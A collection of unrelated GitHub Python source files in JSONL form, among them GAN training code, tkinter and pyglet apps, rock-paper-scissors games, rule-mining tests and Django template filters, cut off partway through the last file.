| Acc %.1f / %.1f'\n % (epoch, opt.niter, i, len(dataloader),\n errD.data, errG.data, D_x, D_G_z1, D_G_z2, cur_val, ave_val))\n # after each epoch, save images\n vutils.save_image(_input,\n '%s/real_samples.png' % opt.outf,\n normalize=True)\n for _zid in range(opt.numz):\n for _mid in range(opt.num_mcmc):\n idx = _zid*opt.num_mcmc + _mid\n netG = netGs[idx]\n fake = netG(fixed_noise)[0]\n vutils.save_image(fake.data,\n '%s/fake_samples_epoch_%03d_G_z%02d_m%02d.png' % (opt.outf, epoch, _zid, _mid),\n normalize=True)\n for ii, netG in enumerate(netGs):\n torch.save(netG.state_dict(), '%s/netG%d_epoch_%d.pth' % (opt.outf, ii, epoch))\n torch.save(netD.state_dict(), '%s/netD_epoch_%d.pth' % (opt.outf, epoch))\n torch.save(netD_fullsup.state_dict(), '%s/netD_fullsup_epoch_%d.pth' % (opt.outf, epoch))\n\n\n#from tensorflow.python.summary import event_accumulator\nfrom tensorboard.backend.event_processing import event_accumulator\nimport pandas as pd\nfrom plotnine import *\nea = event_accumulator.EventAccumulator(opt.outf)\nea.Reload()\n\n_df1 = pd.DataFrame(ea.Scalars('test_acc_semi'))\n_df2 = pd.DataFrame(ea.Scalars('test_acc_sup'))\ndf = pd.DataFrame()\ndf['Iteration'] = pd.concat([_df1['step'], _df2['step']])\ndf['Accuracy'] = pd.concat([_df1['value'], _df2['value']])\ndf['Classification'] = ['BayesGAN']*len(_df1['step']) + ['Baseline']*len(_df2['step'])\n\n\n# The results show that the Bayesian discriminator trained with the Bayesian generator outperforms the discriminator trained on partial data.\n\n\np = ggplot(df, aes(x='Iteration', y='Accuracy', color='Classification', label='Classification')) + geom_point(size=0.5)\nprint(p)\n","repo_name":"gumin2020/MyDissertation","sub_path":"Convolutional_BayesianGAN/Bayesian GAN in PyTorch.py","file_name":"Bayesian GAN in PyTorch.py","file_ext":"py","file_size_in_byte":16531,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"35776645612","text":"from tkinter import *\nimport pandas as pd\nfrom random import choice\n\nBACKGROUND_COLOR = \"#B1DDC6\"\ncurrent_word = {}\ndata_dict = {}\n\ntry:\n data = pd.read_csv('Files/words_to_learn.csv')\nexcept FileNotFoundError:\n original_data = pd.read_csv('Files/french_words.csv')\n data_dict = original_data.to_dict(orient=\"records\")\nelse:\n data_dict = data.to_dict(orient=\"records\")\n\n\ndef change_word():\n global current_word, flip_timer\n window.after_cancel(flip_timer)\n current_word = choice(data_dict)\n canvas.itemconfig(lang, text=\"French\", fill=\"black\")\n canvas.itemconfig(word, text=f\"{current_word['French']}\", fill=\"black\")\n canvas.itemconfig(canvas_image, image=card_front_image)\n flip_timer = window.after(3000, func=flip_card)\n\n\ndef flip_card():\n canvas.itemconfig(lang, text=\"English\", fill=\"white\")\n canvas.itemconfig(word, text=f\"{current_word['English']}\", fill=\"white\")\n canvas.itemconfig(canvas_image, image=card_back_image)\n\n\ndef known_words():\n data_dict.remove(current_word)\n new_data = pd.DataFrame(data_dict)\n new_data.to_csv(\"Files/words_to_learn.csv\", index=False)\n\n change_word()\n\n\nwindow = Tk()\nwindow.title(\"Flash Card App\")\nwindow.config(padx=50, pady=50, bg=BACKGROUND_COLOR)\n\nwindow.tk.call('source', 'Files/azure.tcl')\nwindow.tk.call('set_theme', 'light')\n\nflip_timer = window.after(3000, func=flip_card)\n\ncanvas = Canvas(width=800, height=530, highlightthickness=0, bg=BACKGROUND_COLOR)\ncard_front_image = PhotoImage(file='Files/card_front.png')\ncard_back_image = PhotoImage(file='Files/card_back.png')\nright_image = PhotoImage(file='Files/right.png')\nwrong_image = PhotoImage(file='Files/wrong.png')\ncanvas_image = canvas.create_image(400, 263, image=card_front_image)\nlang = canvas.create_text(400, 200, text=\"\", font=(\"Poppins\", 25))\nword = canvas.create_text(400, 300, text=\"\", font=(\"Poppins\", 76, \"bold\"))\ncanvas.grid(row=1, column=1, columnspan=3)\n\nright_btn = Button(image=right_image, border=0, bg=BACKGROUND_COLOR, cursor='hand2',\n command=known_words, activebackground=BACKGROUND_COLOR)\nright_btn.grid(row=2, column=3)\n\nwrong_btn = Button(image=wrong_image, bg=BACKGROUND_COLOR, border=0, cursor='hand2',\n command=change_word, activebackground=BACKGROUND_COLOR)\nwrong_btn.grid(row=2, column=1)\n\nchange_word()\n\nwindow.mainloop()\n","repo_name":"Maliksidk19/100DaysOfPython","sub_path":"Day31_flashCardApp.py","file_name":"Day31_flashCardApp.py","file_ext":"py","file_size_in_byte":2346,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"25103747720","text":"\"\"\"Implements the padding layer.\"\"\"\nimport typing\n\nfrom decaf.base import Layer, Blob\n\n\nclass PaddingLayer(Layer):\n \"\"\"A Layer that pads a matrix.\"\"\"\n\n def __init__(self, **kwargs):\n \"\"\"\n Initializes a padding layer.\n kwargs:\n 'pad': the number of pixels to pad, Should be non-negative. If pad is 0, the layer will simply mirror the\n input.\n 'value': the value inserted to the padded area. Default 0.\n \"\"\"\n Layer.__init__(self, **kwargs)\n self._pad: int = self.spec['pad']\n self._value: float = self.spec.get('value', 0)\n if self._pad < 0:\n raise ValueError('Padding should be non-negative.')\n\n def forward(self,\n bottom: typing.List[Blob],\n top: typing.List[Blob]):\n \"\"\"Computes the forward pass.\"\"\"\n if self._pad == 0:\n top[0].mirror(bottom[0].data())\n return\n features = bottom[0].data()\n pad = self._pad\n new_shape = (features.shape[0],\n features.shape[1] + pad * 2,\n features.shape[2] + pad * 2) + features.shape[3:]\n output = top[0].init_data(new_shape, features.dtype)\n output[:] = self._value\n output[:, pad:-pad, pad:-pad] = features\n\n def backward(self,\n bottom: typing.List[Blob],\n top: typing.List[Blob],\n propagate_down: bool):\n \"\"\"Computes the backward pass.\"\"\"\n if not propagate_down:\n return 0.\n if self._pad == 0:\n bottom[0].mirror_diff(top[0].diff())\n else:\n pad = self._pad\n top_diff = top[0].diff()\n bottom_diff = bottom[0].init_diff()\n bottom_diff[:] = top_diff[:, pad:-pad, pad:-pad]\n return 0.\n\n def update(self):\n \"\"\"Padding has nothing to update.\"\"\"\n pass\n","repo_name":"xinpingwang/decaf","sub_path":"decaf/layers/padding.py","file_name":"padding.py","file_ext":"py","file_size_in_byte":1907,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"526280271","text":"import click\nfrom rapyuta_io import Build\n\nfrom riocli.build.util import name_to_guid\nfrom riocli.config import new_client\nfrom riocli.utils import inspect_with_format\n\n\n@click.command('inspect')\n@click.option('--format', '-f', 'format_type', default='yaml',\n type=click.Choice(['json', 'yaml'], case_sensitive=False))\n@click.argument('build-name', required=True)\n@name_to_guid\ndef inspect_build(format_type: str, build_guid: str, build_name: str) -> None:\n \"\"\"\n Inspect the build resource\n \"\"\"\n try:\n client = new_client()\n build = client.get_build(build_guid, include_build_requests=True)\n data = make_build_inspectable(build)\n inspect_with_format(data, format_type)\n except Exception as e:\n click.secho(str(e), fg='red')\n raise SystemExit(1)\n\n\ndef make_build_inspectable(build: Build) -> dict:\n build_requests = make_build_requests_inspectable(build)\n build_info = make_build_info_inspectable(build)\n return {\n 'created_at': build.CreatedAt,\n 'updated_at': build.UpdatedAt,\n 'deleted_at': build.DeletedAt,\n 'guid': build.guid,\n 'build_generation': build.buildGeneration,\n 'build_name': build.buildName,\n 'build_info': build_info,\n 'status': build.status,\n 'owner_project': build.ownerProject,\n 'creator': build.creator,\n 'docker_pull_info': build.dockerPullInfo,\n 'build_requests': build_requests,\n 'secret': build.secret,\n 'docker_pull_secret': build.dockerPullSecret,\n 'docker_push_secret': build.dockerPushSecret,\n 'docker_push_repository': build.dockerPushRepository,\n }\n\n\ndef make_build_info_inspectable(build: Build) -> dict:\n build_info = build.buildInfo\n return {\n 'repository': build_info.repository,\n 'strategy_type': build_info.strategyType,\n 'architecture': build_info.architecture,\n 'is_ros': build_info.isRos,\n 'ros_distro': build_info.rosDistro,\n 'simulation_options': {\n 'simulation': build_info.simulationOptions.simulation\n },\n 'build_options': build_info.buildOptions,\n 'branch': build_info.branch,\n 'docker_file_path': build_info.dockerFilePath,\n 'context_dir': build_info.contextDir,\n }\n\n\ndef make_build_requests_inspectable(build: Build) -> list:\n build_request_data = []\n for build_request in build.buildRequests:\n build_request_data.append({\n 'created_at': build_request['CreatedAt'],\n 'updated_at': build_request['UpdatedAt'],\n 'deleted_at': build_request['DeletedAt'],\n 'request_id': build_request['requestId'],\n 'is_complete': build_request['isComplete'],\n 'error_string': build_request['errorString'],\n 'owner_project': build_request['ownerProject'],\n 'creator': build_request['creator'],\n 'trigger_name': build_request['triggerName'],\n 'build_generation': build_request['buildGeneration'],\n 'git_metadata': make_git_metadata_inspectable(build_request['gitMetadata']),\n 'executable_image_info': make_executable_image_info_inspectable(build_request['executableImageInfo']),\n })\n return build_request_data\n\n\ndef make_git_metadata_inspectable(git_metadata: dict) -> dict:\n guid = list(git_metadata.keys())[0]\n guid_details = git_metadata[guid]\n guid_value = {\n 'author': {\n 'email': guid_details['author']['email'],\n 'name': guid_details['author']['name'],\n },\n 'branch': guid_details['branch'],\n 'commit': guid_details['commit'],\n 'committer': {\n 'email': guid_details['committer']['email'],\n 'name': guid_details['committer']['name'],\n },\n 'message': guid_details['message'],\n 'repository_url': guid_details['repositoryUrl']\n }\n return {\n guid: guid_value\n }\n\n\ndef make_executable_image_info_inspectable(exec_img_info: dict) -> dict:\n image_info_list = []\n for img_info in exec_img_info['imageInfo']:\n image_info_list.append({\n 'artifact_id': img_info['artifactID'],\n 'image_name': img_info['imageName'],\n })\n return {\n 'image_info': image_info_list\n }\n","repo_name":"rapyuta-robotics/rapyuta-io-cli","sub_path":"riocli/build/inspect.py","file_name":"inspect.py","file_ext":"py","file_size_in_byte":4309,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"32"} +{"seq_id":"36349618389","text":"import random\nimport tkinter as tk\nfrom tkinter import ttk # themed widgets\n\nWIDTH, HEIGHT = 490, 300\nBUTTON_WIDTH, BUTTON_HEIGHT = 22, 6\n\nroot = tk.Tk()\nroot.resizable(False, False)\nroot.geometry(f'{WIDTH}x{HEIGHT}')\nroot.title('rock_paper_scissors')\n\n\ndef play(choice):\n opponent = random.choice(['rock', 'paper', 'scissors'])\n opponentChoice['text'] = f'{opponent}'\n yourChoice['text'] = f'{choice}'\n if ((choice == 'rock' and opponent == 'scissors') or\n (choice == 'paper' and opponent == 'rock') or\n (choice == 'scissors' and opponent == 'paper')):\n winning['text'] = \"You Won\"\n\n t_splitted = statisticsValue['text'].split('/')\n statisticsValue['text'] = f'{int(t_splitted[0])+1}/{t_splitted[1]}/{t_splitted[2]}'\n elif choice == opponent:\n winning['text'] = \"Draw\"\n t_splitted = statisticsValue['text'].split('/')\n statisticsValue['text'] = f'{t_splitted[0]}/{t_splitted[1]}/{int(t_splitted[2])+1}'\n else:\n winning['text'] = \"You Lost\"\n t_splitted = statisticsValue['text'].split('/')\n statisticsValue['text'] = f'{t_splitted[0]}/{int(t_splitted[1])+1}/{t_splitted[2]}'\n\n\nframeUpper = tk.Frame(root)\n\nrock = tk.Button(frameUpper, text=\"rock\", width=BUTTON_WIDTH, height=BUTTON_HEIGHT, command=lambda: play('rock'))\nrock.grid(row=1, column=0)\n\npaper = tk.Button(frameUpper, text=\"paper\", width=BUTTON_WIDTH, height=BUTTON_HEIGHT, command=lambda: play('paper'))\npaper.grid(row=1, column=1)\n\nscissors = tk.Button(frameUpper, text=\"scissors\", width=BUTTON_WIDTH, height=BUTTON_HEIGHT,\n command=lambda: play('scissors'))\nscissors.grid(row=1, column=2)\n\n\nwinning = ttk.Label(root, text=\"Press button to play...\", font='Times 20 bold')\nwinning.grid(row=2)\n\nyourChoiceLabel = ttk.Label(root, text=\"Your Choice:\", font='Times 18')\nyourChoiceLabel.grid(row=3, column=0, sticky=tk.W)\n\nyourChoice = ttk.Label(root, text=\"\", font='Times 20 italic')\nyourChoice.grid(row=3, column=0)\n\nopponentChoice = ttk.Label(root, text=\"Opponent Choice:\", font='Times 18')\nopponentChoice.grid(row=4, column=0, sticky=tk.W)\n\nopponentChoice = ttk.Label(root, text=\"\", font='Times 20 italic')\nopponentChoice.grid(row=4, column=0)\n\nstatistics = ttk.Label(root, text=\"Statistics(W,L,D):\", font='Times 16')\nstatistics.grid(row=5, column=0, sticky=tk.W)\n\nstatisticsValue = ttk.Label(root, text=\"0/0/0\", font='Times 18')\nstatisticsValue.grid(row=5, column=0)\n\nframeUpper.grid(row=1)\nroot.mainloop()\n","repo_name":"noxikoxi/zadaniaPython","sub_path":"zestaw10/rock_paper_scissors.py","file_name":"rock_paper_scissors.py","file_ext":"py","file_size_in_byte":2492,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"26549706284","text":"\nfrom pyglet.gl import *\nfrom pyglet.window import mouse\nfrom src.window import Window\nfrom src.cube import *\nfrom config import *\n\ndef setup():\n\n # Set the color of \"clear\", i.e. the sky, in rgba.\n glClearColor(BG_COLOR[0], BG_COLOR[1], BG_COLOR[2],BG_COLOR[3])\n\n # Enable culling (not rendering) of back-facing facets -- facets that aren't\n # visible to you.\n # glEnable( GL_CULL_FACE )\n # Set the texture minification/magnification function to GL_NEAREST (nearest\n # in Manhattan distance) to the specified texture coordinates. GL_NEAREST\n # \"is generally faster than GL_LINEAR, but it can produce textured images\n # with sharper edges because the transition between texture elements is not\n\n # as smooth.\"\n glTexParameteri(GL_TEXTURE_2D, GL_TEXTURE_MIN_FILTER, GL_NEAREST)\n glTexParameteri(GL_TEXTURE_2D, GL_TEXTURE_MAG_FILTER, GL_NEAREST)\n\n glEnable(GL_FOG)\n # Set the fog color.\n glFogfv(GL_FOG_COLOR, (GLfloat * 4)(BG_COLOR[0], BG_COLOR[1], BG_COLOR[2],BG_COLOR[3]))\n # Say we have no preference between rendering speed and quality.\n glHint(GL_FOG_HINT, GL_DONT_CARE)\n # Specify the equation used to compute the blending factor.\n glFogi(GL_FOG_MODE, GL_LINEAR)\n # How close and far away fog starts and ends. The closer the start and end,\n # the denser the fog in the fog range.\n glFogf(GL_FOG_START, 20.0)\n glFogf(GL_FOG_END, 60.0)\n\n\ndef main():\n window = Window( width=800, height=600, caption='Pyglet', resizable=True )\n # Hide the mouse cursor and prevent the mouse from leaving the window.\n window.set_exclusive_mouse(True)\n setup()\n pyglet.app.run()\n\nif __name__ == '__main__':\n main()\n","repo_name":"y-vas/game","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1685,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"32"} +{"seq_id":"28627809120","text":"# |MODULES|--------------------------------------------------------------------\nimport sys\nimport os.path\nMODULE_PATH = os.path.dirname(__file__)\nimport pandas as pd\nimport pickle as pk\n\n\ndef assess(x):\n clf = pk.load(open(os.path.join(MODULE_PATH,'finalized_model.sav'), 'rb'))\n mean = pk.load(open(os.path.join(MODULE_PATH,'mean.sav'), 'rb'))\n var = pk.load(open(os.path.join(MODULE_PATH,'var.sav'), 'rb'))\n x = (x - mean)/var\n x = x.to_numpy().reshape(1, -1)\n return clf.predict(x)[0]\n\n\nif __name__ == \"__main__\":\n test = pd.read_csv('trainlist.csv')\n y = test.loc[:, \"Class\"].to_numpy()\n test = test.iloc[:, 1:-2]\n for i in range(test.shape[0]):\n #for j, val in enumerate(test.iloc[i].to_list()):\n # print(\"{}\\t{}\\n\".format(j, val))\n print(assess(test.iloc[i]))\n\n # clf = pk.load(open('finalized_model.sav', 'rb'))\n # mean = pk.load(open('mean.sav', 'rb'))\n # print(mean)\n # var = pk.load(open('var.sav', 'rb'))\n # print(var)\n # test = (test - mean)/var\n # test = test.to_numpy()\n\n # predict = clf.score(test, y)\n # print(predict)\n\n\n #print(assess(sample.reshape(1, -1)))\n #train = pd.read_csv('testlist.csv')\n #mean = train.iloc[:, 1:-2].mean(axis=0).to_list()\n #var = train.iloc[:, 1:-2].std(axis=0).to_list()\n #pk.dump(mean, open('mean.sav', 'wb'))\n #pk.dump(var, open('var.sav', 'wb'))\n #print(test)\n #print(mean)\n #print(var)\n\n sys.exit(0)\n","repo_name":"regisaiah/ECE-499---Classifier","sub_path":"mentalfatigue.py","file_name":"mentalfatigue.py","file_ext":"py","file_size_in_byte":1464,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"15809668780","text":"\r\nimport random\r\n\r\nclass Game(): #class game with four methods\r\n \r\n def __init__(self):\r\n self.user_item = self.get_user_item()\r\n self.computer_item = self.get_computer_item()\r\n self.winner = self.get_game_result()\r\n \r\n @staticmethod\r\n def get_user_item(): #method to get user input\r\n \r\n user_item = input(\"Choose between (rock/paper/scissors) \\n\")\r\n first_choice= [\"rock\",\"paper\",\"scissors\"]\r\n \r\n for i in first_choice: # loop through the list of options\r\n \r\n if i == user_item:\r\n return user_item\r\n \r\n while user_item not in first_choice:\r\n user_item = input(\"Choose between (rock/paper/scissors) \\n\") \r\n @staticmethod\r\n def get_computer_item(): #method for computer choice\r\n \r\n second_choice = [\"rock\",\"paper\",\"scissors\"]\r\n computer = random.choice(second_choice)\r\n return computer\r\n \r\n def get_game_result(self): #method to display winner\r\n if self.user_item == \"rock\" and self.computer_item == \"paper\":\r\n return \"Computer\"\r\n if self.user_item == \"rock\" and self.computer_item == \"scissors\":\r\n return \"User \"\r\n if self.user_item == \"paper\" and self.computer_item == \"rock\":\r\n return \"User\"\r\n if self.user_item == \"scissors\" and self.computer_item == \"rock\":\r\n return \"Computer\"\r\n if self.user_item == \"rock\" and self.computer_item == \"rock\":\r\n return \"Draw\"\r\n if self.user_item == \"paper\" and self.computer_item == \"scissors\":\r\n return \"Computer\"\r\n if self.user_item == \"scissors\" and self.computer_item == \"paper\":\r\n return \"User\"\r\n if self.user_item == \"paper\" and self.computer_item == \"paper\":\r\n return \"Draw\"\r\n if self.user_item == \"scissors\" and self.computer_item == \"scissors\":\r\n return \"Draw\"\r\n \r\n def play(self): \r\n if self.winner == \"Draw\": \r\n print(f'user 1 selected {self.user_item} and computer selected {self.computer_item} There a tie')\r\n else:\r\n print(f'user 1 selected {self.user_item} and computer selected {self.computer_item} The winner is {self.winner}')\r\n \r\ntest = Game()\r\n\r\n\r\ntest.play()\r\n\r\n\r\n\r\n\r\n\r\n \r\n ","repo_name":"Mengawanji/Dev-Ins","sub_path":"Week 5/day 5/game.py","file_name":"game.py","file_ext":"py","file_size_in_byte":2355,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"30627662814","text":"from lxml import etree\nfrom pprint import pprint as pp\n\nfilename = \"CBS_COLBERT_{episode:04d}_CONTENT_CIAN_caption_{kind}.xml\"\nfilepath = \"data/\" + filename\n\nfor i in range(1, 20):\n path = filepath.format(kind=\"DFXP\", episode=i)\n\n tree = etree.parse(path)\n root = tree.getroot()\n\n ns_mapping = {'ns':'http://www.w3.org/ns/ttml'}\n full_text = \" \".join([ptext for ptext in root.xpath('//ns:tt/ns:body/ns:div/ns:p//text()', namespaces=ns_mapping)])\n\n pp(full_text.split(\">>\"))","repo_name":"tsizzle/the-late-show-with-stephen-colbert-analysis","sub_path":"parser.py","file_name":"parser.py","file_ext":"py","file_size_in_byte":491,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"13948933731","text":"def print2largest(arr, arr_size):\n if (arr_size < 2):\n print(\" Invalid Input \");\n return\n largest = second = -2454635434;\n for i in range(0, arr_size):\n largest = max(largest, arr[i]);\n for i in range(0, arr_size):\n if (arr[i] != largest):\n second = max(second, arr[i])\n \n if (second == -2454635434):\n print(\"There is no second \" +\n \"largest element\")\n else:\n print(\"The second largest \" +\n \"element is \\n\", second)\n \narr = list(map(int,input().split()))\nn = len(arr)\nprint2largest(arr, n)\n","repo_name":"Arshadfaizan/aps-codelibrary","sub_path":"SecondLargest.py","file_name":"SecondLargest.py","file_ext":"py","file_size_in_byte":600,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"32"} +{"seq_id":"3609397043","text":"# from mock import patch\nimport datetime\nfrom mock import patch\nfrom tests import BaseCase\nfrom api import mining_api\n\nBDAY_TUPLE = (1982, 9, 2, 16, 30, 0) # yay my birthday\n\n\nclass MiningTestsBase(BaseCase):\n pass\n\n\n# Association RuleSet Tests\n'''\nclass QueryRuleSetEntitiesTests(MiningTestsBase):\n \"\"\"\n Tests around querying for Association RulesSets\n \"\"\"\n def setUp(self):\n super(QueryRuleSetEntitiesTests, self).setUp()\n\n m2 = mining_api.AssociationRuleModel(['Cheese:1', 'Peanut Butter:0'],\n ['Steak:1'],\n .25)\n\n mining_api.create_rules('ruleset_id', [m1, m2])\n\n def test_no_params(self):\n raise Exception('not yet')\n result = mining_api._query_rule_entities()\n\n self.assertEqual(len(result), 2)\n self.assertTrue(isinstance(result[0], mining_api.AssociationRuleEntity))\n self.assertTrue(isinstance(result[1], mining_api.AssociationRuleEntity))\n'''\n\n\nclass CreateRulesetTests(MiningTestsBase):\n\n @patch('api.mining_api.get_resource_id_from_key', return_value='mocked_id')\n def test_base(self, m_get_id):\n result = mining_api.create_ruleset(.4, .7)\n\n self.assertTrue(isinstance(result, mining_api.AssociationRuleSetModel))\n self.assertEqual(result.min_confidence, .7)\n self.assertEqual(result.min_support, .4)\n self.assertEqual(result.total_rules, None)\n self.assertTrue(isinstance(result.created_timestamp, datetime.datetime))\n self.assertEqual(result.id, 'mocked_id')\n\n# Association Rule Tests\n\n\nclass RuleModelTests(MiningTestsBase):\n def test_get_rule_item_id(self):\n \"\"\"\n Ensure we can generate a composite pref id for use in txn lists\n representing item and if the session user liked it or not.\n \"\"\"\n\n rule_model = mining_api.AssociationRuleModel(['Peanut Butter:1', 'Steak:0', 'Peanut Butter:0'],\n ['Cheese:0'],\n .25)\n\n self.assertEqual(rule_model.generate_rule_key(), 'peanut_butter:0__peanut_butter:1__steak:0')\n\n\nclass QueryRuleEntitiesTests(MiningTestsBase):\n \"\"\"\n Tests around querying for Association Rules\n \"\"\"\n def setUp(self):\n super(QueryRuleEntitiesTests, self).setUp()\n\n m1 = mining_api.AssociationRuleModel(['Peanut Butter:1', 'Steak:0', 'Peanut Butter:0'],\n ['Cheese:0'],\n .25)\n m2 = mining_api.AssociationRuleModel(['Cheese:1', 'Peanut Butter:0'],\n ['Steak:1'],\n .25)\n\n mining_api.create_rules('ruleset_id', [m1, m2])\n\n def test_no_params(self):\n result, cursor, more = mining_api._query_rule_entities()\n\n self.assertEqual(len(result), 2)\n self.assertTrue(isinstance(result[0], mining_api.AssociationRuleEntity))\n self.assertTrue(isinstance(result[1], mining_api.AssociationRuleEntity))\n\n\nclass QueryRuleModelsTests(MiningTestsBase):\n @patch('api.mining_api._query_rule_entities')\n @patch('api.mining_api._populate_rule_model')\n def test_base(self, mock_populate, mock_query):\n # Setup Mocks\n mock_query.return_value = (['a', 'b'], None, False)\n\n # Run Code To Test\n result = mining_api.query_rule_models(limit=4, kwarg=True)\n\n # Check results\n self.assertEqual(result, ([mock_populate.return_value, mock_populate.return_value], None, False))\n mock_query.assert_called_once_with(limit=4, kwarg=True)\n\n\n@patch('api.mining_api.get_resource_id_from_key', return_value='mocked_id')\nclass CreateRuleTest(MiningTestsBase):\n \"\"\"Tests around creating a single AssociationRuleModel\"\"\"\n\n def test_base(self, m_get_id):\n ant = ['Peanut Butter:1', 'Steak:0', 'Peanut Butter:0']\n con = ['Cheese:0']\n\n m = mining_api.AssociationRuleModel(ant, con, .85)\n result = mining_api.create_rule('ruleset_id', m)\n\n self.assertTrue(isinstance(result, mining_api.AssociationRuleModel))\n self.assertEqual(result.ant, ['Peanut Butter:1', 'Steak:0', 'Peanut Butter:0'])\n self.assertEqual(result.con, ['Cheese:0'])\n self.assertEqual(result.confidence, .85)\n self.assertEqual(result.rule_key, 'peanut_butter:0__peanut_butter:1__steak:0')\n self.assertEqual(result.id, 'mocked_id')\n self.assertEqual(result.ruleset_id, 'ruleset_id')\n\n\n@patch('api.mining_api.get_resource_id_from_key', return_value='mocked_id')\nclass CreateMultiTest(MiningTestsBase):\n \"\"\"Tests around creating multiple AssociationRuleModel at once\"\"\"\n def test_base(self, m_get_id):\n ant = ['Peanut Butter:1', 'Steak:0', 'Peanut Butter:0']\n con = ['Cheese:0']\n\n m1 = mining_api.AssociationRuleModel(ant, con, .85)\n m2 = mining_api.AssociationRuleModel(ant, con, .85)\n result = mining_api.create_rules('ruleset_id', [m1, m2])\n\n self.assertTrue(isinstance(result, list))\n\n self.assertTrue(isinstance(result[0], mining_api.AssociationRuleModel))\n self.assertEqual(result[0].ant, ant)\n self.assertEqual(result[0].con, con)\n self.assertEqual(result[0].confidence, .85)\n self.assertEqual(result[0].rule_key, 'peanut_butter:0__peanut_butter:1__steak:0')\n self.assertEquals(result[0].id, 'mocked_id')\n self.assertEqual(result[0].ruleset_id, 'ruleset_id')\n\n self.assertEqual(m_get_id.call_count, 2)\n\n\nclass DeleteRulesTests(MiningTestsBase):\n def setUp(self):\n super(DeleteRulesTests, self).setUp()\n\n m1 = mining_api.AssociationRuleModel(['Peanut Butter:1', 'Steak:0', 'Peanut Butter:0'],\n ['Cheese:0'],\n .25)\n mining_api.create_rules('ruleset_id', [m1])\n\n def base_test(self):\n\n self.assertEqual(1, len(mining_api.query_rule_models()[0]))\n mining_api.delete_rules()\n self.assertEqual(0, len(mining_api.query_rule_models()[0]))\n\n\"\"\"\n\nclass DeleteRulesSinceTests(MiningTestsBase):\n def base_test(self):\n result = mining_api.delete_rules_since()\n\"\"\"\n\n\n\"\"\"\n\nclass RunAprioriTests(MiningTestsBase):\n def base_test(self):\n result = mining_api.run_apriori()\n\"\"\"\n\"\"\"\n\nclass PrintItemsAndRulesTests(MiningTestsBase):\n def base_test(self):\n result = mining_api._print_items_and_rules()\n\n\"\"\"\n\"\"\"\n\nclass PopulateEntityTests(MiningTestsBase):\n def base_test(self):\n result = mining_api._populate_entity()\n\"\"\"\n","repo_name":"divrods/pref-service","sub_path":"tests/api_tests/mining_api_tests.py","file_name":"mining_api_tests.py","file_ext":"py","file_size_in_byte":6682,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"70883098972","text":"import calendar\nimport datetime\nimport math\n\nfrom collections import defaultdict\n\nfrom django import template\nfrom django.core.paginator import Paginator, EmptyPage\nfrom django.db.models.query import QuerySet\nfrom django.utils.safestring import mark_safe\nfrom django.template import defaultfilters\n\nfrom synnefo.lib.ordereddict import OrderedDict\nfrom synnefo.util import units\n\nfrom astakos.im import settings\nfrom astakos.im.models import ProjectResourceGrant, Project\nfrom astakos.im.views import util as views_util\nfrom astakos.im import util\nfrom astakos.im import presentation\nfrom astakos.im.models import AstakosUser\n\nfrom astakos.im import quotas\n\nregister = template.Library()\n\nDELIM = ','\n\n\ndef _is_inf(value):\n try:\n return value == units.PRACTICALLY_INFINITE\n except:\n return False\n\n\n@register.filter\ndef monthssince(joined_date):\n now = datetime.datetime.now()\n date = datetime.datetime(\n year=joined_date.year, month=joined_date.month, day=1)\n months = []\n\n month = date.month\n year = date.year\n timestamp = calendar.timegm(date.utctimetuple())\n\n while date < now:\n months.append((year, month, timestamp))\n\n if date.month < 12:\n month = date.month + 1\n year = date.year\n else:\n month = 1\n year = date.year + 1\n\n date = datetime.datetime(year=year, month=month, day=1)\n timestamp = calendar.timegm(date.utctimetuple())\n\n return months\n\n\n@register.filter\ndef to_unicode(s):\n return unicode(s)\n\n\n@register.filter\ndef to_string(s):\n return str(s)\n\n\n@register.filter\ndef lookup(d, key):\n try:\n return d.get(key)\n except:\n return\n\n\n@register.filter\ndef lookup_uni(d, key):\n return d.get(unicode(key))\n\n\n@register.filter\ndef dkeys(d):\n return d.keys()\n\n\n@register.filter\ndef month_name(month_number):\n return calendar.month_name[month_number]\n\n\n@register.filter\ndef todate(value, arg=''):\n secs = int(value) / 1000\n return datetime.datetime.fromtimestamp(secs)\n\n\n# @register.filter\n# def rcut(value, chars='/'):\n# return value.rstrip(chars)\n\n\n@register.filter\ndef paginate(l, args):\n l = l or []\n page, delim, sorting = args.partition(DELIM)\n if sorting:\n if isinstance(l, QuerySet):\n l = l.order_by(sorting)\n elif isinstance(l, list):\n default = ''\n if sorting.endswith('_date'):\n default = datetime.datetime.utcfromtimestamp(0)\n l.sort(key=lambda i: getattr(i, sorting)\n if getattr(i, sorting) else default)\n paginator = Paginator(l, settings.PAGINATE_BY)\n try:\n paginator.len\n except AttributeError:\n paginator._count = len(list(l))\n\n try:\n page_number = int(page)\n except ValueError:\n if page == 'last':\n page_number = paginator.num_pages\n else:\n page_number = 1\n try:\n page = paginator.page(page_number)\n except EmptyPage:\n page = paginator.page(1)\n return page\n\n\n@register.filter\ndef concat(str1, str2):\n if not str2:\n return str(str1)\n return '%s%s%s' % (str1, DELIM, str2)\n\n\n@register.filter\ndef items(d):\n if isinstance(d, defaultdict):\n return d.iteritems()\n return d\n\n\n@register.filter\ndef get_value_after_dot(value):\n return value.split(\".\")[1]\n\n# @register.filter\n# def strip_http(value):\n# return value.replace('http://','')[:-1]\n\n\n@register.filter\ndef truncatename(v, max=18, append=\"...\"):\n util.truncatename(v, max, append)\n\n\n@register.filter\ndef selected_resource_groups(project_or_app):\n if not project_or_app:\n return []\n\n grants = project_or_app.resource_set\n resources = grants.values_list('resource__name', flat=True)\n return map(lambda r: r.split(\".\")[0], resources)\n\n\n@register.filter\ndef 